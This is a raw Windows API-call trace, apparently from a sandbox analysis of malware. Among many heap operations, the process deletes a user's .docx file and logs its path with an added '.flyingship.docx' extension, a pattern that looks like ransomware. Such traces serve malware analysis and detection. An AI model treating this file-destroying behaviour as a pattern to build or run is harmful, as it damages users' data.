hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0171.043] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0171.044] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0171.044] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0171.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.045] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0171.045] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0171.045] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.045] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0171.045] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.048] FreeLibrary (hLibModule=0x75990000) returned 1 [0171.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0171.048] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpFilePart=0x0) returned 0x39 [0171.049] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0xb4d8ac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 0x90af58 [0171.049] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\j0tjz4pqz2gw.docx")) returned 1 [0171.056] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5249d40, ftCreationTime.dwHighDateTime=0x1d5d056, ftLastAccessTime.dwLowDateTime=0x45d595f0, ftLastAccessTime.dwHighDateTime=0x1d5921d, ftLastWriteTime.dwLowDateTime=0xb4d8ac0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1880e, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="j0tJZ4pqz2gw.docx", cAlternateFileName="J0TJZ4~1.DOC")) returned 0 [0171.056] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0171.057] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0171.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0171.057] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0171.057] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0171.058] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.058] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0171.058] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.058] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0171.058] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.058] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0171.058] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0xe5c, lpOverlapped=0x0) returned 1 [0171.059] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0171.059] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xe5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.059] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0171.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0171.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0171.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0171.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0171.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa4f8 [0171.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\n", cchWideChar=71, lpMultiByteStr=0x9aa4f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 71 [0171.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0171.059] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0171.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0171.059] WriteFile (in: hFile=0x120, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0171.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0171.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0171.060] CloseHandle (hObject=0x120) returned 1 [0171.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0171.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0171.061] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0171.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.062] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.063] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0171.063] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.063] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.063] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.063] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0171.063] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0171.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd408 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0171.064] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0171.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.064] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.064] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0171.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0171.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0171.065] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.065] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.066] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0171.066] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 